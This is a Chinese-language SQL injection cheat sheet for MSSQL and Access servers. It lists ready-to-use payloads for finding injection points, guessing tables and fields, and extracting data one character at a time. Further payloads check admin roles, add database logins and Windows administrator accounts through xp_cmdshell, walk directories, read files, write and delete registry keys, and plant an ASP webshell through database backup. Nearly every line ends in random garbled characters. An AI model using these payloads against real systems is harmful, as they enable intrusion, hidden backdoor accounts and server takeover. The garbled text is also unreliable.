1.判断是否有注入;and 1=1 ;and 1=2 Wv||9[Rd��
2.初步判断是否是mssql ;and user>0 "7Z-ACyF5�
xqb*�;TBh*
3.注入参数是字符'and [查询条件] and ''=' 3EH�B~rL/C
:(iBL��O<x
4.搜索时没过滤参数的'and [查询条件] and '%25'=' t:"3M�iM=c
wJC� ��F"e
5.判断数据库系统 er�h��ez��
@`qB[<t8:<
;and (select count(*) from sysobjects)>0 mssql d� ehK#��8
X��e&p.v�
;and (select count(*) from msysobjects)>0 access �qKr�xln/T
��EbG��&[v
�@H8DG�eM�
��(K_{a+$[
6.猜数据库 ;and (select Count(*) from [数据库名])>0 V8Ri2&�|�3
6Ad����C�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1��oba��jN
~=Q^��]�y,
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 S�c]G7_�
�/0o#�V-E)
9.(1)猜字段的ascii值(access) � OA�^6�l#
�Y�?�����$
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �'�Y�.6�sB
m(D+!I�9�
(2)猜字段的ascii值(mssql) Y]��tbwOle
1�|m%xX,�[
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �pp{��2�[>
m%�=*3gH]&
10.测试权限结构(mssql) y�,/i3^y#_
]��GO=�8$Z
[+_>g4M�~%
4f��L`.n1^
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- g^�^pPV�K_
�VVDW�=�G�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 5M/�~�|"xk
�dI|��D c�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- jweX"G54R�
�rsq?4�+\
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Sy'�]fGvx�
%D�A&txX}w
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- o7s�!ti\�G
kD0bdE|��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +I?k8�',pi
4,>9N�9.?9
;and 1=(select IS_MEMBER('db_owner'));-- �P)��cE�Yk
!6x7^�E;�c
�CW2)1%1iz
=t`cHs29�
11.添加mssql和系统的帐户 }*C*!?p�cd
3I(;c ��,S
;exec master.dbo.sp_addlogin username;-- K:^0*5�Y-k
;exec master.dbo.sp_password null,username,password;-- sk�BD�2V�4
oEX^U�4/=�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �91]s�O%3�
k��<�5g�
;exec master.dbo.xp_cmdshell 'net user username password >ZW|�wpO��
�Z/d��hp0k
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �4Us_�Z�{.
]x�{.q�Ttw
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �r?IBmatK/
0zE@��?�.
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- k(M:#o�A!�
QZ�tQogNy#
rOz1tY)l0d
>���l�f�uo
12.(1)遍历目录 lj Ud�sU�w
l&}}Io$?@
;create table dirs(paths varchar(100), id int) �NSB�cYObX
b�]��f���x
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��d�Oa9�D
v�+I-*,�R�
;and (select top 1 paths from dirs)>0 I�o|D���u
AL.ps�w-Il
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) !=A;?��Kdq
IrMB=pWo�
+<��j7^AEG
8�XG'�;K_�
(2)遍历目录 �.r�2*tB).
9�Msy=qvYG
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- z~ywFk}KGd
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Z %Ozzp/��
�</WeB3#�6
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 IvT><8<�G
t&:L?�K)�j
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 [:FiA?��O]
a�&V;^� /�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 DU0/if9��.
.�]� sJl�
^�lAM� /
�
8;V9%h`P>
13.mssql中的存储过程 tq}45�{FH3
jn:_2�g[
xp_regenumvalues 注册表根键, 子键 I�#��&r�5Q
s�2#Ia>5!�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 i'��7+
?YL
D�:;��idUO
xp_regread 根键,子键,键值名 LP=�j/q�f|
���f�T|A^
;exec xp_regread W*t]
d���
�B�M�y3tyO
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 @p��hVfP"M
\ l�#eW
�x
xp_regwrite 根键,子键, 值名, 值类型, 值 5&V=�$]��t
])o{!}QUl\
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 %�/"n(?$�W
A�eb(b+=�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ~/]]H;;^u�
#3�QP�coxa
xp_regdeletevalue 根键,子键,值名 q�D4]�7"9�
S0)JIr�rHC
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 &�CQO+Yr$l
�l�I� 4tW=
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 2S{P��(B��
�K5jt(7i��
N�S~;�{d�\
DK\�XC%~m�
14.mssql的backup创建webshell �\�xj�;{xc
+yp:douERi
use model �:-B+�W9'5
d=PX}��o^�
create table cmd(str image); N�+=�|We�Z
8�0Dn!9j�*
insert into cmd(str) values (''); R�qtBz�3v
�a:�f���P�
backup database model to disk='c:\l.asp'; U}��RBgPX!
U�owvk�Va�
y
%Q.����(
#cu{��A�dK
15.mssql内置函数 _cX}!d�!j
z��*�EV>Y[
;and (select @@version)>0 获得Windows的版本号 �y���:W6;R
��V0=%$tH�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa [b:�&��y(�
gvA}s/�� �
;and (select user_name())>0 爆当前系统的连接用户 yQiY�:SH��
-�GA��F��>
;and (select db_name())>0 得到当前连接的数据库 �c]PTU2BB8
lP�Z�(c%P
n�^Ca?|}
,
�+���e-F`k
16.简洁的webshell x#�J9�GP�.
gSz�<K.CT
use model �x9"Cm�;H%
�H�OR8Jwf:
create table cmd(str image); 9{*{B�a���
P.'.KZJ:WD
insert into cmd(str) values (''); �@u�p,��5`
%.M�a_4o
Z
backup database model to disk='g:\wwwtest\l.asp';
